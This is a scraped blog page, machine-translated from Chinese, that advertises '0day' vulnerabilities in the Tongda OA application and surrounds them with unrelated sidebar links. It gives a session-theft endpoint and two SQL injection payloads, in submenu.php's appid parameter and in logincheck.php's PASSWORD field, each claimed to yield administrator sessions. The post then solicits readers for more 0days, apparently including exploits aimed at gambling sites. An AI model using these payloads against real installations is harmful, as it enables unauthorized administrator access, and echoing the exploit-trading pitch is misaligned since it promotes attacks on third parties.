当前位置:网站首页>Tongda injection 0day
Tongda injection 0day
2022-07-07 07:35:00 【Immortal fish】
Catalog
The old version of Tongda Application :
Loophole 1:
The vulnerability lies in :
/ispirit/login_code_check.php?codeuid=An attacker can get the administrator session
python Script :
no
Loophole principle : The main reason is that the old version has unauthorized access .
Loophole 2:
Leak location :
pda/appcenter/submenu.php?appid=11+and+pow(999,1)The loophole is appid There is an injection , You can get the administrator sessions
Loophole 3:
Leak location :
logincheck.php
UNAME=admin&PASSWORD='&encode_type=1The loophole is password There is an injection , You can get the administrator sessions
more 0day Please subscribe to me ~ In addition, our px send bc Of 0day, You can contact me
边栏推荐
- Deep learning Flower Book + machine learning watermelon book electronic version I found
- [2022 CISCN]初赛 web题目复现
- 4、 High performance go language release optimization and landing practice youth training camp notes
- At the age of 20, I got the ByteDance offer on four sides, and I still can't believe it
- Asynchronous components and suspend (in real development)
- I failed in the postgraduate entrance examination and couldn't get into the big factory. I feel like it's over
- 电商常规问题part1
- Tencent's one-day life
- [Linux] process control and parent-child processes
- Tumor immunotherapy research prosci Lag3 antibody solution
猜你喜欢
idea添加类注释模板和方法模板
2022-07-06:以下go语言代码是否会panic?A:会;B:不会。 package main import “C“ func main() { var ch chan struct
My ideal software tester development status
Leetcode-226. Invert Binary Tree
BGP experiment (1)
Bindingexception exception (error reporting) processing
Initial experience of teambiion network disk (Alibaba cloud network disk)
身边35岁程序员如何建立起技术护城河?
记一个并发规则验证实现
@component(““)
随机推荐
【leetcode】1020. Number of enclaves
JS decorator @decorator learning notes
PostgreSQL source code (60) transaction system summary
My ideal software tester development status
1090: integer power (multi instance test)
Detailed explanation of transform origin attribute
Model application of time series analysis - stock price prediction
Docker compose start redis cluster
Pass parent component to child component: props
计算机服务中缺失MySQL服务
直播平台源码,可折叠式菜单栏
Causes and solutions of oom (memory overflow)
Advanced level of C language (high level) pointer
$refs: get the element object or sub component instance in the component:
Project practice five fitting straight lines to obtain the center line
Kuboard无法发送邮件和钉钉告警问题解决
微博发布案例
Differences between H5 architecture and native architecture
Wechat applet full stack development practice Chapter 3 Introduction and use of APIs commonly used in wechat applet development -- 3.9 introduction to network interface (IX) extending the request3 met
基于Flask搭建个人网站